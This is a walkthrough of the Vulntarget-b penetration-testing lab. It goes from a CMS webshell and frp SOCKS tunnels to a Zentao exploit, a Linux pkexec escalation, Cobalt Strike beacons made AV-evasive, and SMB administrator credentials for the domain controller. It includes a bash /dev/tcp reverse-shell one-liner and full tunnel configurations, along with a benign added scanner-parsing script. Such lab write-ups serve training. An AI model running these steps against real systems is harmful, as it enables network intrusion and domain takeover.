Vulntarget-b
0 Information gathering
I had just come across the scaninfo tool, so I gave it a quick try; the results were decent.
{"ip":"192.168.1.114","port":21,"service":"ftp","Banner":"220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------\\x0d\\x0a220-You are user number 1 of 50 allowed.\\x0d\\x0a220-Local time is now 14:48. Server port: 21.\\x0d\\x0a220-This is a private system - No anonymous login\\x0d\\x0a220-IPv6 connections are also welcome on this server.\\x0d\\x0a220 You will be disconnected after 15 minutes of inactivity.\\x0d\\x0a500 HTTP command: [get]\\x0d\\x0a","url":""}
{"ip":"192.168.1.114","port":22,"service":"","Banner":"","url":""}
{"ip":"192.168.1.114","port":3306,"service":"mysql","Banner":"NOT ALLOWED","url":""}
{"ip":"192.168.1.114","port":110,"service":"","Banner":"","url":""}
{"ip":"192.168.1.114","port":25,"service":"","Banner":"","url":""}
{"ip":"192.168.1.114","port":80,"service":"http","Banner":"","url":"http://192.168.1.114:80"}
{"ip":"192.168.1.114","port":81,"service":"http","Banner":"","url":"http://192.168.1.114:81"}
{"ip":"192.168.1.114","port":8888,"service":"http","Banner":"","url":"http://192.168.1.114:8888"}
{"url":"http://192.168.1.114:80","StatusCode":200,"Title":"没有找到站点","HeaderDigest":"server:nginx","Length":1326,"KeywordFinger":"宝塔-BT.cn","HashFinger":""}
{"url":"http://192.168.1.114:81","StatusCode":200,"Title":"极致CMS建站系统","HeaderDigest":"server:nginx","Length":14398,"KeywordFinger":"","HashFinger":""}
{"url":"http://192.168.1.114:8888","StatusCode":200,"Title":"安全入口校验失败","HeaderDigest":"server:nginx","Length":802,"KeywordFinger":"宝塔-BT.cn","HashFinger":"宝塔-BT.cn"}
There are two exposed web services: BT Panel (宝塔) on port 8888 and the 极致CMS site builder on port 81.
BT Panel is a bit of a pain, so let's look at 极致CMS first.
1 Initial access
Ran a directory scan; almost everything came back 403, and only readme.txt and admin.php were useful.
readme.txt contains the version number: 极致CMS Beta1.8.1. admin.php is the admin login page. Searched for vulnerabilities and found that article on 先知; tried a good number of weak passwords and finally admin/admin123 worked. After that, just follow the steps in the article.
Connected with AntSword (蚁剑); executing commands returned ret=127, so disable_functions had to be bypassed. Used the plugin to bypass it directly.
2 Internal network information gathering
The current host's IP is 192.168.1.114. Checked the network segment... no response.
Uploaded a bigger webshell, but it reported that the commands did not exist.
Switched approach and looked at /proc/net/arp instead.
小小火 pointed out that binaries can be run via /sbin/*, because that directory is not in the environment's PATH (the default is /usr/bin).
Found an internal segment, 10.0.20.0/24, and a live host, 10.0.20.66 (from the ARP table).
Used scaninfo against that IP with host discovery disabled: ./scaninfo -np -i 10.0.20.66
{"ip":"10.0.20.66","port":3306,"service":"mysql","Banner":"NOT ALLOWED","url":""}
{"ip":"10.0.20.66","port":8080,"service":"http","Banner":"","url":"http://10.0.20.66:8080"}
{"url":"http://10.0.20.66:8080","StatusCode":200,"Title":"","HeaderDigest":"server:Microsoft-IIS/10.0","Length":141,"KeywordFinger":"禅道","HashFinger":""}
3 Internal network tunneling
Used frp for the tunnel.
Run frps on the public VPS with the following frps.ini:
[common]
bind_addr = 0.0.0.0
bind_port = 7788
Run frpc on the target machine with the following frpc.ini:
[common]
server_addr = x.x.x.x # public IP of the VPS
server_port = 7788
[http_proxy]
type = tcp
remote_port = 7777
plugin = socks5
Run ./frpc -c frpc.ini and the server receives the connection.
4 Internal host 1
10.0.20.66:8080 is a 禅道 (Zentao) project management system.
Visit http://10.0.20.66:8080/index.php?mode=getconfig to query the version information.
Click "log in with the demo account" to get into the backend, then use CNVD-C-2020-121325 to get a shell; that vulnerability requires an administrator account, though.
A good buddy told me the credentials are admin/Admin123...
Started an HTTP server with Python on 10.0.20.30: python -m SimpleHTTPServer 11881
Then just follow the exploitation steps.
The result is a low-privileged user.
There is a domain, vulntarget.com, on the 10.0.10.0/24 segment.
tasklist /svc shows 火绒 (Huorong antivirus) is running.
5 Setting up a second-level tunnel
Do not tear down the first-level proxy.
Deployment order (server first, then client): internet-facing host as server ---> internal host as client ---> VPS as server ---> internet-facing host as client
VPS (server)
[common]
bind_addr = 0.0.0.0
bind_port = 7799
allow_ports = 1000-2000
Internet-facing host (client)
[common]
server_addr = 47.102.44.211
server_port = 7799
[http_proxy]
type = tcp
local_ip = 10.0.20.30
local_port = 1080
remote_port = 1080
Internet-facing host (server)
[common]
bind_addr = 10.0.20.30
bind_port = 7799
allow_ports = 1000-2000
Internal host (client)
[common]
server_addr = 10.0.20.30
server_port = 7799
[http_proxy]
type = tcp
remote_port = 1080
plugin = socks5
Originally I wanted to load a bigger webshell through the proxy, but it never worked, so I kept going with just the proxy.
6 Taking the domain controller: method 1
Uploaded scaninfo and ran a scan; it directly obtained the domain controller credentials (scaninfo is awesome).
{"ip":"10.0.10.99","port":445,"service":"","Banner":"","url":""}
{"ip":"10.0.10.99","port":139,"service":"netbios-ssn","Banner":"","url":""}
{"ip":"10.0.10.100","port":88,"service":"","Banner":"","url":""}
{"ip":"10.0.10.100","port":139,"service":"netbios-ssn","Banner":"","url":""}
{"ip":"10.0.10.99","port":135,"service":"msrcp","Banner":"\\x05\\x00\\x0d\\x03\\x10\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x08\\x01@\\x04\\x00\\x01\\x05\\x00\\x00\\x00\\x00","url":""}
{"ip":"10.0.10.100","port":135,"service":"msrcp","Banner":"\\x05\\x00\\x0d\\x03\\x10\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x08\\x01@\\x04\\x00\\x01\\x05\\x00\\x00\\x00\\x00","url":""}
{"ip":"10.0.10.99","port":3306,"service":"mysql","Banner":"NOT ALLOWED","url":""}
{"ip":"10.0.10.100","port":389,"service":"ldap","Banner":"","url":""}
{"ip":"10.0.10.100","port":110,"service":"","Banner":"","url":""}
{"ip":"10.0.10.100","port":445,"service":"microsoft-ds","Banner":"\\x00\\x00\\x00\\x83ÿSMBr\\x00\\x00\\x00\\x00\\x88\\x01@\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00@\\x06\\x00\\x00\\x01\\x00\\x11\\x07\\x00\\x0f2\\x00\\x01\\x00\\x04A\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00üó\\x01\\x00M\\x7f\\x81à\\x9c;Ø\\x01 þ\\x08>\\x00\\x89ÓÀ\\x0bÁ]µwV\\x00U\\x00L\\x00N\\x00T\\x00A\\x00R\\x00G\\x00E\\x00T\\x00\\x00\\x00W\\x00I\\x00N\\x00-\\x00U\\x00H\\x002\\x000\\x00P\\x00R\\x00D\\x003\\x00E\\x00A\\x00O\\x00\\x00\\x00","url":""}
{"ip":"10.0.10.100","port":25,"service":"","Banner":"","url":""}
{"ip":"10.0.10.100","port":3389,"service":"rdp","Banner":"Windows Vista or later","url":""}
{"ip":"10.0.10.100","port":53,"service":"dns","Banner":"-NOBANNER-","url":""}
{"ip":"10.0.10.99","port":25,"service":"","Banner":"","url":""}
{"ip":"10.0.10.99","port":110,"service":"","Banner":"","url":""}
{"ip":"10.0.10.99","port":8080,"service":"http","Banner":"","url":"http://10.0.10.99:8080"}
{"findnet":"findnet","host":"10.0.10.100","result":"NetInfo:\n[*]10.0.10.100\n [->]WIN-UH20PRD3EAO\n [->]10.0.10.100"}
{"NetBIOS":"NetBIOS","host":"10.0.10.100","result":"[*] 10.0.10.100 [+]DC VULNTARGET\\WIN-UH20PRD3EAO Windows Server 2016 Datacenter 14393"}
{"url":"http://10.0.10.99:8080","StatusCode":200,"Title":"","HeaderDigest":"server:Microsoft-IIS/10.0","Length":141,"KeywordFinger":"禅道","HashFinger":""}
{"cve-2020-0796":"cve-2020-0796","host":"10.0.10.99","port":445,"result":"[+] 10.0.10.99 CVE-2020-0796 SmbGhost Vulnerable"}
{"smb":"smb","host":"10.0.10.99","password":"admin@123","username":"administrator"}
{"smb":"smb","host":"10.0.10.100","password":"Admin@123","username":"administrator"}
Then just RDP in through the proxy that was already set up.
7 Taking the domain controller: method 2
Because AntSword's shell is stateless, which is cumbersome, I popped a reverse shell from the internet-facing host: bash -i >& /dev/tcp/ip/port 0>& 1
Check the system version: cat /proc/version, cat /etc/redhat-release
Found several privilege-escalation CVEs, but they threw an error when run (environment variable problem), so another route was needed; CS could not be used either, which left only msf.
Searched and found that msf has an automatic privilege-escalation suggester module, so I tried it.
(In between, the suggester module would not load in the msf on the VPS, so I used frp plus a local Kali.)
Later it turned out to be a bug in the latest version? Went back to the VPS and escalated successfully with pkexec.
Ran shell to drop into an interactive shell and found a flag in the root directory.
Ran the CS payload; it checked in successfully and command execution works.
Generated a pivot listener, which works as a relay.
Because 4.2 cannot produce a payload for the pivot listener, used web delivery, downloaded it, extracted the shellcode, then made it AV-evasive.
It would not check in for ages; my guess is that a Linux session cannot pivot.
Changed approach: let it check in over the internet using goproxy (the first time it started OK but was unusable; the second time it worked).
Created a beacon that goes through the proxy.
Generated a stageless payload, made it evasive, uploaded it, ran it, and it checked in!
Checked the patch level: CVE-2021-1732 could be used for privilege escalation, but 火绒 killed it immediately, so I set escalation aside and did some information gathering first. On the 10.0.10.0 segment, apart from this host there is only one other live host.
Scanned it with scaninfo and confirmed it is the domain controller.
{"ip":"10.0.10.100","port":135,"service":"msrcp","Banner":"\\x05\\x00\\x0d\\x03\\x10\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x08\\x01@\\x04\\x00\\x01\\x05\\x00\\x00\\x00\\x00","url":""}
{"ip":"10.0.10.100","port":139,"service":"netbios-ssn","Banner":"","url":""}
{"ip":"10.0.10.100","port":88,"service":"","Banner":"","url":""}
{"ip":"10.0.10.100","port":389,"service":"ldap","Banner":"","url":""}
{"ip":"10.0.10.100","port":3389,"service":"rdp","Banner":"Windows Vista or later","url":""}
{"ip":"10.0.10.100","port":110,"service":"","Banner":"","url":""}
{"ip":"10.0.10.100","port":445,"service":"microsoft-ds","Banner":"\\x00\\x00\\x00\\x83ÿSMBr\\x00\\x00\\x00\\x00\\x88\\x01@\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00@\\x06\\x00\\x00\\x01\\x00\\x11\\x07\\x00\\x0f2\\x00\\x01\\x00\\x04A\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00üó\\x01\\x00\\x96ë«W`<Ø\\x01 þ\\x08>\\x00+\\x011Ø\\x14lÃ*V\\x00U\\x00L\\x00N\\x00T\\x00A\\x00R\\x00G\\x00E\\x00T\\x00\\x00\\x00W\\x00I\\x00N\\x00-\\x00U\\x00H\\x002\\x000\\x00P\\x00R\\x00D\\x003\\x00E\\x00A\\x00O\\x00\\x00\\x00","url":""}
{"ip":"10.0.10.100","port":53,"service":"dns","Banner":"-NOBANNER-","url":""}
{"ip":"10.0.10.100","port":25,"service":"","Banner":"","url":""}
{"findnet":"findnet","host":"10.0.10.100","result":"NetInfo:\n[*]10.0.10.100\n [->]WIN-UH20PRD3EAO\n [->]10.0.10.100"}
{"NetBIOS":"NetBIOS","host":"10.0.10.100","result":"[*] 10.0.10.100 [+]DC VULNTARGET\\WIN-UH20PRD3EAO Windows Server 2016 Datacenter 14393"}
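The following is an added example, not code from the original writeup or from scaninfo itself: a small Python triage script that parses scaninfo's JSON-lines output (the record shapes shown in sections 0, 2, 6 and 7) into a per-host inventory plus a findings list, so the result of a scan can be reviewed at a glance. The SAMPLE lines are constructed from the record formats above; the credential record uses a placeholder password, and the script never echoes secrets.

```python
# Added example: triage scaninfo JSON-lines output. Record shapes follow the
# writeup: port/service, HTTP fingerprint, findnet/NetBIOS, vulnerability
# check and SMB credential hit. SAMPLE is constructed (placeholder secret).
import json
from collections import defaultdict
from urllib.parse import urlsplit

SAMPLE = r'''
{"ip":"10.0.10.100","port":389,"service":"ldap","Banner":"","url":""}
{"ip":"10.0.10.100","port":3389,"service":"rdp","Banner":"Windows Vista or later","url":""}
{"ip":"10.0.10.99","port":8080,"service":"http","Banner":"","url":"http://10.0.10.99:8080"}
{"url":"http://10.0.10.99:8080","StatusCode":200,"Title":"","HeaderDigest":"server:Microsoft-IIS/10.0","Length":141,"KeywordFinger":"禅道","HashFinger":""}
{"findnet":"findnet","host":"10.0.10.100","result":"NetInfo:\n[*]10.0.10.100\n [->]WIN-UH20PRD3EAO\n [->]10.0.10.100"}
{"NetBIOS":"NetBIOS","host":"10.0.10.100","result":"[*] 10.0.10.100 [+]DC VULNTARGET\\WIN-UH20PRD3EAO Windows Server 2016 Datacenter 14393"}
{"cve-2020-0796":"cve-2020-0796","host":"10.0.10.99","port":445,"result":"[+] 10.0.10.99 CVE-2020-0796 SmbGhost Vulnerable"}
{"smb":"smb","host":"10.0.10.99","password":"<placeholder>","username":"administrator"}
this line is not JSON and must be skipped
'''

def parse_scaninfo(text):
    """Return (hosts, findings): hosts maps ip -> ports/web/notes,
    findings is a list of (severity, host, description) tuples."""
    hosts = defaultdict(lambda: {"ports": {}, "web": [], "notes": []})
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue  # tolerate truncated or non-JSON lines in the output
        if "ip" in rec and "port" in rec:            # open port / service record
            hosts[rec["ip"]]["ports"][rec["port"]] = rec.get("service") or "?"
        elif "StatusCode" in rec:                    # HTTP fingerprint record
            ip = urlsplit(rec["url"]).hostname
            finger = rec.get("KeywordFinger") or rec.get("HashFinger") or ""
            hosts[ip]["web"].append((rec["url"], rec["StatusCode"], finger))
        elif "smb" in rec and "username" in rec:     # credential hit: report, never print it
            findings.append(("critical", rec["host"], f"SMB login succeeded as {rec['username']}"))
        elif any(k.lower().startswith("cve-") for k in rec):   # vulnerability check
            findings.append(("high", rec["host"], rec["result"].strip()))
        elif "NetBIOS" in rec or "findnet" in rec:   # host identification records
            hosts[rec["host"]]["notes"].append(rec["result"].replace("\n", " | "))
            if "[+]DC" in rec["result"]:
                findings.append(("info", rec["host"], "host identifies as a domain controller"))
    return dict(hosts), findings

if __name__ == "__main__":
    inventory, hits = parse_scaninfo(SAMPLE)
    for ip, info in sorted(inventory.items()):
        print(ip, sorted(info["ports"].items()), info["web"], info["notes"])
    for sev, host, desc in hits:
        print(f"[{sev}] {host}: {desc}")
```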
Tested it: running the privilege-escalation exploit from inside CS did not get it killed (confusing), but the exploit needs a "press any key to continue". Looked it up: that can be handled with echo, but it could not be used here. So I modified the source to remove the pause and asked a friend to compile it; when run, it got killed... Then I realized it had not been killed earlier because no Enter was ever sent, so it never actually executed.
Then I made the exploit AV-evasive; still no luck. I'm worn out. This privilege escalation has to rely on msf, which loads the exploit straight into memory and executes it, with complete logic and no input required.
Giving up for now... vulntarget-b has to be done with msf; I don't yet have a way to do it with CS.